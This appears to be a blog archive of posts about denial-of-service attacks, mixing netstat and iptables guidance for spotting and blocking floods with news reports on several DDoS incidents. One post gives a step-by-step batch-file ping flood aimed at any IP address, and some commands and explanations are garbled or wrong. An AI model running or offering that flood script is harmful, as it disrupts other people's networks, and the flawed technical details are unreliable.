Archive for the ‘DoS Attack’ Category

Ytv-Linuxour server appearing pretty slow could be many things from wrong configs, scripts and dodgy hardware – but sometimes it could be because someone is flooding your server with traffic known as DoS ( Denial of Service ) or DDoS ( Distributed Denial of Service ).

Denial-of-service attack (DoS attack) or Distributed Denial-of-service attack (DDoS attack) is an attempt to make a machine or network resource unavailable to its intended users. This attack generally target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. DoS attacks are implemented by either forcing the targeted computer to reset, or consuming its resources so that it can no longer provide its services or obstructs the communication media between the users and the victim so that they can no longer communicate adequately.

In this small article you’ll see how to check if your server is under attack from the Linux Terminal with the netstat command

From the man page of netstat “netstat – Print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships”

Some examples with explanation

netstat -na
This display all active Internet connections to the server and only established connections are included.

netstat -an | grep :80 | sort
Show only active Internet connections to the server on port 80, this is the http port and so it’s useful if you have a web server, and sort the results. Useful in detecting a single flood by allowing you to recognize many connections coming from one IP.

netstat -n -p|grep SYN_REC | wc -l
This command is useful to find out how many active SYNC_REC are occurring on the server. The number should be pretty low, preferably less than 5. On DoS attack incidents or mail bombs, the number can jump to pretty high. However, the value always depends on system, so a high value may be average on another server.

netstat -n -p | grep SYN_REC | sort -u
List out the all IP addresses involved instead of just count.

netstat -n -p | grep SYN_REC | awk ‘{print $5}’ | awk -F: ‘{print $1}’
List all the unique IP addresses of the node that are sending SYN_REC connection status.

netstat -ntu | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n
Use netstat command to calculate and count the number of connections each IP address makes to the server.

netstat -anp |grep ‘tcp|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n
List count of number of connections the IPs are connected to the server using TCP or UDP protocol.

netstat -ntu | grep ESTAB | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -nr
Check on ESTABLISHED connections instead of all connections, and displays the connections count for each IP.

netstat -plan|grep :80|awk {‘print $5’}|cut -d: -f 1|sort|uniq -c|sort -nk 1
Show and list IP address and its connection count that connect to port 80 on the server. Port 80 is used mainly by HTTP web page request.

How to mitigate a DOS attack

Once that you have found the IP that are attacking your server you can use the following commands to block their connection to your server:

iptables -A INPUT 1 -s $IPADRESS -j DROP/REJECT
Please note that you have to replace $IPADRESS with the IP numbers that you have found with netstat.
After firing the above command, KILL all httpd connections to clean your system and than restart httpd service by
using the following commands:

killall -KILL httpd

service httpd start #For Red Hat systems
/etc/init/d/apache2 restart #For Debian systems

 

Advertisements

tv crime2
How Ping of Death attack works?
Not all computers can handle data larger than a fixed size. So, when a ping of death packet is sent from a source computer to a target machine, the ping packet gets fragmented into smaller groups of packets.

One fragment is of 8 octets size. When these packets reach the target computer, they arrive in fragments. So, the target computer reassembles the malformed packets which are received in chunks. But, the whole assembled packet causes buffer overflow at the target computer.

This buffer flow often causes the system crash making the system more vulnerable to attack.

Once the system becomes more vulnerable to attack, it allows more attacks like the injection of a trojan horse on the target machine.

A simple tutorial on how to perform DoS attack using ping of death using CMD:

Disclaimer: This is just for educational purposes. It’s nothing great but you can use it to learn.

Here are the steps:

  • Open Notepad
  • Copy the following text on the notepad

:loop
ping <IP Address> -l 65500 -w 1 -n 1
goto :loop

In the above command, replace <IP Address> with an IP address.

  • Save the Notepad with any name. Let’s say dos.txt
  • Right click on the dos.txt and click on rename.
  • Change the extension from .txt to .bat
  • So, now the file name should be dos.bat
  • Double click on it and you will see a command prompt running with a lot of pings.

tv crime2
Government CIO says National Research Council was hit by intrusion from ‘sophisticated’ state-sponsored actor

The Canadian government has said it will take it a year to build a more secure IT infrastructure after the National Research Council (NRC) was hit by a recent cyber attack it’s blaming on Beijing.

In a brief statement, the NRC said that intelligence agency the Communications Security Establishment had recently “detected and confirmed” an intrusion into its infrastructure.

“Following assessments by NRC and its security partners, action has been taken to contain and address this security breach, including protecting its information holdings and notifying the Privacy Commissioner. NRC has also taken steps to inform its clients and stakeholders about this situation,” it added.

“NRC is continuing to work closely with its IT experts and security partners to create a new secure IT infrastructure. This could take approximately one year however; every step is being taken to minimize disruption.”

A separate statement by the Government of Canada CIO went further, claiming the attack was perpetrated by a “highly sophisticated Chinese state-sponsored actor”.

“While the National Research Council’s networks do not currently operate within the broader Government of Canada network, since the detection and confirmation of the cyber intrusion, the National Research Council’s networks have been isolated from the broader Government of Canada network as a precautionary measure,” it added.

“We have no evidence that data compromises have occurred on the broader Government of Canada network.

China appears to have assumed its typical stance in response to such allegations – outright denial.

Yang Yundong, a Chinese embassy spokesman in Ottowa, emailed Bloomberg to angrily refute what he described as “groundless allegations”.

The question now remains whether, after potentially a whole year, the NRC’s newly fortified security systems will be up to the task of defending against the next generation of advanced attacks no doubt currently being developed by nation states.

Amichai Shulman, CTO of security firm Imperva, argued that any “meaningful change” to IT infrastructure takes time.

“It is quite obvious today that adopting a technology across a large organization takes more time than it takes for the next technology to emerge,” he told Infosecur

“This is the reality and we should embrace it. Organizations find different ways to handle this risk in the general IT domain and particularly in the IT security domain.”

Planning infrastructure changes with “visionary consultants” and installing products from vendors who have capabilities “on top of market requirements” are just two ways to future-proof systems, he added.

“Moreover, by working with vendors who provide holistic solutions rather than niche products and system integrators who provide the integration between products of different domains the organization is better fitted for the unforeseen challenges of the day after deployment ends,” claimed Shulman.

Richard Cassidy, senior solutions architect at Alert Logic, argued that auditing and continual review of “security systems, practices and data” can help organizations stay one step ahead of more advanced threats.
“It is positive that the need to review existing infrastructure and practices has been identified, but more importantly for NRC is in the understanding on why the incident occurred and how they can assure they put in place processes around existing available technologies to continually monitor, review and respond to anomalies, suspicious activity or unauthorized access attempts to critical assets once the new infrastructure is implemented,” he added

Reported by Infosecurity

tv-Annon

24-year-old Jacob Allen Wilkens of Postville, Iowa, has been sentenced to 24 months’ probation for participating in the attack launched by Anonymous against Angel Soft, a subsidiary of Koch Industries. He has also been ordered to pay $110,932.71 (€80,919.64) in restitution. Wilkens has admitted launching distribute denial-of-service (DDoS) attacks against the website of bathroom tissue company Angel Soft in February and March 2011. The web server that hosts the website is located in Green Bay, Wisconsin.
Koch Industries said the attack had caused losses of several hundred thousand dollars. The Iowa man is the third to be sentenced. Back in December 2013, 38-year-old Eric J. Rosol was sentenced to two years’ probation. Earlier this month, 22-year-old Christopher Michael Sudlik of St. Louis, Missouri, was sentenced to three years’ probation and 60 hours of community service.

tv-Joystick

 

A Famous shooter video games “Battlefield” was hit by Denial of service attack, actually its version 4 of PC was attacked and as a result of the attack—game was unplayable for the users.
Battlefield is a series of first-person shooter video games that started out on Microsoft Windows and OS X with its debut video game, Battlefield 1942, which was released in 2002.
It is confirmed by the Game developers in a forum’s thread, ”We are being targeted by a DDOS, but working on fixing it asap,” said Battlefield producer Ali Hassoon. ”I’m sorry somebody is ruining your and my day. Rest assured we are doing our best to mitigate the situation though.”
Battlefield 4 is not only the one that is experiencing the issues. In a Battlelog update today, DICE laid out plans for how it hopes to improve the game across multiple platforms.
Battlefield 4 launched on October 29 for PC, Xbox 360, and PlayStation 3, before coming to PS4 last week as a launch title. The military FPS will be released this Friday, November 22, for Xbox One.
– See more at: http://hackersnewsbulletin.com

tv crime2

Samsung

A vulnerability in the latest firmware of the network-enabled Samsung TV models allows potential attackers to crash the vulnerable devices using Denial of Service (DoS) Attack, according to security researcher Malik Mesellem.
According to Malik, The web server (DMCRUIS/0.1) installed on Smart TVs on port TCP/5600 can be crashed to reboot the device, if attacker will send a long HTTP GET request on TV’s IP address.

Malik successfully tested the exploit on his Samsung PS50C7700 plasma TV, as shown in the video below:

In the Demo, The TV is connected by Ethernet cable to a home network, and after running the exploit against TV’s ip address – A few seconds later, the TV would restart and repeat the process.
This means that a potential attacker only needs to obtain access to the LAN that the TV has joined, in order to attack it. This can be done either by breaking into a wireless access point or by infecting a computer on the same network with malware.
Malik discovered the flaw on July 21st, 2013, published a proof-of-concept exploit on his website and vulnerability dubbed CVE-2013-4890. I think, now we need firewall or antivirus protection for our television set too.